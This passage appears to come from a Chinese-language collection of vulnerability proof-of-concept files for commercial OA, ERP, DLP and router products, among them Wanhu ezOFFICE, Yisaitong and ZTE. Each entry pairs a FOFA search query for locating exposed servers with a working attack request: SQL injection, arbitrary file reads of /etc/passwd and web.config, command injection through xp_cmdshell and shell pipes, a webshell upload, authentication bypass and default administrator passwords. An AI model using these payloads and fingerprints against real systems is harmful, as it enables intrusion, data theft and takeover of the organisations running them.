6 | /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/wpoc/万户OA/万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="万户ezOFFICE协同管理平台"
6 | ```
7 |
8 | ## POC
9 | ```
10 | GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
11 | Host: {{host}}
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
13 | Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
14 | Accept-Encoding: gzip, deflate
15 | Accept-Language: zh-CN,zh;q=0.9
16 | Connection: close
17 |
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/万户OA/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md:
--------------------------------------------------------------------------------
1 | # 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)
2 |
3 | 万户ezOFFICE协同管理平台 `/defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp`接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="万户网络-ezOFFICE"
9 | ```
10 |
11 |
12 | ## poc
13 |
14 | ```yaml
15 | GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
16 | Host:
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/万户OA/万户协同办公平台存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ## 万户协同办公平台存在未授权访问漏洞
2 | ```
3 |
4 | GET /defaultroot/evoInterfaceServlet?paramType=user
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/万户OA/万户协同办公平台接口存在文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 万户协同办公平台接口存在文件上传漏洞
2 | ```
3 |
4 | POST
5 | /defaultroot/wpsservlet?option=saveNewFile&newdocld=jsp&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
6 | Host:xxx.xxx.xxx.xxx
7 | User-Agent:
8 | Content-Length:266
9 | Cache-Control:max-age=0
10 | Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6
11 | Accept-Encoding: gzip,deflate
12 | Connection:close
13 |
14 | --221e166d60f34112b3c17fa95818ecfe
15 | Content-Disposition:form-data;name="NewFile";filename="jsp.jsp"
16 |
17 | <% jsp 上传的木马地址 %>
18 |
19 | --221e166d60f34112b3c17fa95818ecfe--
20 | ```
21 |
--------------------------------------------------------------------------------
/wpoc/万能门店小程序/万能门店小程序doPageGetFormList存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 万能门店小程序doPageGetFormList存在sql注入漏洞
2 |
3 | 万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序,万能门店小程序doPageGetFormList存在sql注入漏洞
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "/comhome/cases/index.html"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /api/wxapps/doPageGetFormList HTTP/1.1
15 | Host:
16 | Content-Type: application/x-www-form-urlencoded
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
18 |
19 | suid='AND GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)-- bdmV
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/上讯信息技术股份有限公司/上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞
2 |
3 | 上海上讯信息技术股份有限公司运维管理系统 `/emailapply/RepeatSend`存在命令执行漏洞,获取服务器权限。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="default/getloginhtml"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /emailapply/RepeatSend HTTP/1.1
15 | Content-Type: application/x-www-form-urlencoded
16 | Connection: close
17 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36
18 |
19 | id='%0aping dnslog.cn%0a'
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/世纪信通管理系统/世纪信通管理系统DownLoadFiles.ashx存在任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## 世纪信通管理系统DownLoadFiles.ashx存在任意文件读取
2 |
3 |
4 | ## poc
5 | ```
6 | GET /WeChatConfig/ashx/DownLoadFiles.ashx?filePath=c:/windows/win.ini HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25X
9 | Content-Length: 4
10 | ```
11 |
--------------------------------------------------------------------------------
/wpoc/东华医疗协同办公系统/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md:
--------------------------------------------------------------------------------
1 | # 东华医疗协同办公系统templateFile存在任意文件下载漏洞
2 |
3 | 东华医疗协同办公系统 templateFile 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="东华医疗协同办公系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 | ```
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/中兴/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞
2 |
3 | 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞,任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | title="ZSRV2路由器Web管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /css//../../../../../../../../etc/passwd HTTP/1.1
15 | Host: {{Hostname}}
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/中成科信票务管理系统/中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞
2 |
3 | 中成科信票务管理系统 SeatMapHandler.ashx 接口处存在SQL注入漏洞复现,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="技术支持:北京中成科信科技发展有限公司"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
15 | Host: {{Hostname}}
16 | Content-Type: application/x-www-form-urlencoded
17 |
18 | Method=GetZoneInfo&solutionNo=1'%3bDECLARE+%40x+CHAR(9)%3bSET+%40x%3d0x
19 | 303a303a35%3bWAITFOR+DELAY+%40x--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/中科智远科技综合监管云平台/中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞
2 |
3 | 中科智远科技-综合监管云平台 /Download/DownFile 存在任意文件读取漏洞,读取数据库配置文件导致数据泄露。
4 |
5 |
6 | ## fofa
7 |
8 | ```
9 | icon_hash="-227059202"
10 | ```
11 |
12 | ## poc
13 |
14 | ```
15 | /Download/DownFile?fileName=../web.config
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/乐享智能运维管理平台/乐享智能运维管理平台getToken存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 乐享智能运维管理平台getToken存在SQL注入漏洞
2 |
3 | 乐享智能运维管理平台getToken存在SQL注入漏洞
4 |
5 | ## hunter
6 |
7 | ```yaml
8 | title="乐享智能运维管理平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /auth-ui/v1/api/user/token/getToken HTTP/1.1
15 |
16 | account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/云时空/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md:
--------------------------------------------------------------------------------
1 | # 云时空社会化商业ERP系统online存在身份认证绕过漏洞
2 |
3 | ## fofa
4 |
5 | ```java
6 | app="云时空社会化商业ERP系统"
7 | ```
8 |
9 | ## poc
10 |
11 | 获取sessionid值,替换emscm.session.id,刷新页面即可登录后台
12 |
13 | ```java
14 | GET /sys/user/online HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
17 | Accept: */*
18 | Accept-Encoding: gzip, deflate, br
19 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
20 | Connection: close
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/云时空/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 时空智友企业流程化管控系统formservice存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | body="企业流程化管控系统" && body="密码(Password):"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | POST /formservice?service=workflow.sqlResult HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
15 | Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
16 | Connection: keep-alive
17 | Content-Type: application/json
18 | Accept-Encoding: gzip
19 | Content-Length: 50
20 |
21 | {"params":{"a":"11"},"sql":"select @@version"}
22 | ```
23 |
--------------------------------------------------------------------------------
/wpoc/交易所系统/仿新浪外汇余额宝时间交易所任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## 仿新浪外汇余额宝时间交易所任意文件读取
2 |
3 | 
4 |
5 | ## fofa
6 |
7 | ```
8 | "/static/index/css/ionic.css" && "devework.com"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /index.php/index/Api/curlfun?url=file:///etc/passwd HTTP/1.1
15 | Host:
16 | ```
17 |
18 | ```
19 | GET /index.php/index/Api/post_curl?url=file:///etc/passwd&data=1 HTTP/1.1
20 | Host:
21 | ```
22 |
23 | 
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞
2 |
3 | ## poc
4 | ```
5 | POST /CDGServer3/document/UploadFileManagerService;login HTTP/1.1
6 | Host: 127.0.0.1
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
8 |
9 | command=ViewUploadFile&filePath=c:/windows/win.ini&fileName1=111111
10 | ```
11 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="亿赛通电子文档安全管理系统"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://ip/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` DeviceAjax`接口的`SecureUsbid`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-DLP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/js/../DeviceAjax HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=delSecureUsb&SecureUsbid=-1'waitfor delay '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` FileFormatAjax`接口的`fileFormatId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-DLP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/js/../FileFormatAjax HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=delFileFormat&fileFormatId=-1'waitfor delay '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` MultiServerAjax`接口的`serverId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-DLP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/js/../MultiServerAjax HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=delServer&serverId=-1'waitfor delay '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /CDGServer3/js/../NavigationAjax HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | command=nav&id=-999'waitfor delay '0:0:3'--+&name=&openId=
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` NetSecPolicyAjax`接口的`id`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-DLP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/js/../NetSecPolicyAjax HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=upPriority&id=-1'waitfor delay '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` OrganiseAjax`接口的`groupNameSearch`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-DLP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/js/../OrganiseAjax HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=search&groupNameSearch=-1'waitfor delay '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /CDGServer3/document/RestoreFiles;login HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
9 | Accept: */*
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: zh-CN,zh;q=0.9
12 |
13 | command=DownloadDoc&fileNameForDownload=&downPath=c:/windows/win.ini
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞
2 |
3 | 亿赛通电子文档安全管理系统的 SecretKeyService接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```java
8 | body="/CDGServer3/index.jsp"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /CDGServer3/SecretKeyService?command=sameKeyName&keyName=1'+WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
15 | Host: your-ip
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞
2 |
3 | 亿某通电子文档安全管理系统` SecureUsbService`接口的`id`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="亿赛通-电子文档安全管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /CDGServer3/device/SecureUsbService;login HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | command=DelSecureUsb&id=a';WAITFOR+DELAY+'0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="亿赛通-电子文档安全管理系统"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /CDGServer3/document/UploadFileList;login HTTP/1.1
11 | Host:
12 | Accept-Encoding: gzip, deflate
13 | Accept-Language: zh-CN,zh;q=0.9
14 | Connection: close
15 | Content-Type: application/x-www-form-urlencoded
16 | Content-Length: 66
17 |
18 | command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=hello
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="/CDGServer3/index.jsp"
6 | ```
7 | ## poc
8 | ```
9 | POST /CDGServer3/downloadfromfile HTTP/1.1
10 | Host:
11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
12 | Content-Type: application/x-www-form-urlencoded
13 |
14 | fileName=../../../../../../../../../../../windows/win.ini
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞
2 |
3 | 亿赛通电子文档安全管理系统 /CDGServer3/logincontroller 接口存在远程代码执行漏洞。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="/CDGServer3/index.jsp"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /CDGServer3/logincontroller HTTP/1.1
15 | Host:
16 | Content-Type: application/x-www-form-urlencoded
17 | Connection: close
18 |
19 | fromurl=/LdapAjax&token=1&command=testConnection&hosts=ldap://192.168.10.1:1379/CN=account,OU=exp,DC=exp,DC=com&users=account&dns=CN=account,OU=exp,DC=exp,DC=com&dns2=OU=exp,DC=exp,DC=com&type=0&pwds=123456
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md:
--------------------------------------------------------------------------------
1 | # 亿赛通电子文档安全管理系统存在3处弱口令漏洞
2 |
3 | 亿赛通电子文档安全管理系统(E-SafeDoc)是一种用于保护企业和组织的敏感信息的安全管理系统。它通过对电子文档进行加密、权限控制和日志记录等措施,确保数据的安全性。然而,这类系统有时会出现安全漏洞,其中之一就是弱口令漏洞。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="/CDGServer3/index.jsp"
9 | ```
10 |
11 | ## poc
12 |
13 | ### druid
14 |
15 | ```javascript
16 | /CDGServer3/druid/login.html
17 | 账号:druid
18 | 密码:EstNet.Druid
19 | ```
20 |
21 | ### 文档管理员弱口令
22 |
23 | ```
24 | 账号:DocAdmin
25 | 密码:Est@Spc820
26 | ```
27 |
28 | ### 日志管理员弱口令
29 |
30 | ```
31 | 账号:LogAdmin
32 | 密码:Est@Spc820
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/wpoc/企望制造-ERP/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## 企望制造 ERP comboxstore.action 远程命令执行漏洞
2 | ```
3 |
4 | POST /mainFunctions/comboxstore.action HTTP/1.1
5 | Content-Type: application/x-www-form-urlencoded
6 | Host: xxx.xxx.xxx.xxx
7 |
8 | comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
9 | ```
10 |
--------------------------------------------------------------------------------
/wpoc/企望制造ERP/企望制造 ERP comboxstore.action 远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## 企望制造 ERP comboxstore.action 远程命令执行漏洞
2 | ```
3 |
4 | POST /mainFunctions/comboxstore.action HTTP/1.1
5 | Content-Type: application/x-www-form-urlencoded
6 | Host: xxx.xxx.xxx.xxx
7 |
8 | comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
9 | ```
10 |
--------------------------------------------------------------------------------
/wpoc/信呼OA/信呼OA系统index存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 信呼OA系统index存在SQL注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```java
8 | icon_hash="1652488516"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
17 | ```
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/全息AI网络运维平台/全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | # 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞
2 |
3 | 全息AI网络运维平台 接口 /nmss/cloud/Ajax/ajax_cloud_router_config.php 存在命令执行漏洞,导致服务器沦陷。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | "全息AI网络运维平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
15 | host:127.0.0.1
16 |
17 | ping_cmd=8.8.8.8|cat /etc/passwd>1.txt
18 | ```
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/北京亚控科技/北京亚控科技KingPortal开发系统漏洞集合.md:
--------------------------------------------------------------------------------
1 | ## 北京亚控科技KingPortal开发系统漏洞集合
2 |
3 | ## Hunter
4 | ```
5 | web.title="KingPortal"
6 | ```
7 |
8 |
9 | ## 弱口令
10 | ```
11 | admin001/admin001
12 | admin001/kf_admin
13 | ```
14 |
15 | ## 信息泄露
16 | ```
17 | /ProjectManager.json
18 | /config/externalConfig.json
19 | ```
20 |
21 | ## KingPortal开发系统未授权访问
22 | ```
23 | http://域名:11002/views/ProjectDataSourceAccess.html?token=2ccdf191078bd4e8e85b526ec44f7dd31ad7cf81&refreshToken=null
24 |
25 | ```
26 |
27 | ## 漏洞来源
28 | - https://mp.weixin.qq.com/s/fYnLnoeHvYFwaSSKfBjQZw
29 |
--------------------------------------------------------------------------------
/wpoc/医药信息管理系统/医药信息管理系统GetLshByTj存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 医药信息管理系统GetLshByTj存在SQL注入
2 |
3 | ## fofa
4 |
5 | ```
6 | icon_hash="775044030"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | /WebService.asmx/GetLshByTj?djcname=%31%27%3b%77%61%69%74%66%6f%72%20%64%65%6c%61%79%20%27%30%3a%30%3a%33%27%2d%2d%20%2d&redonly=true&tjstr=12
13 | ```
14 |
15 | 
--------------------------------------------------------------------------------
/wpoc/华为Auth-Http Serve/华为Auth-Http Serve任意文件读取.md:
--------------------------------------------------------------------------------
1 |
2 | ## 华为Auth-Http Serve任意文件读取
3 | 华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器,在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等,可以实现用户身份认证、授权和审计等功能。同时,可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
4 | ## fofa
5 | ```
6 | server="Huawei Auth-Http Server 1.0"
7 | ```
8 |
9 | ## POC
10 | ```
11 | /umweb/shadow
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/华为Auth-Http-Serve/华为Auth-Http-Serve任意文件读取.md:
--------------------------------------------------------------------------------
1 |
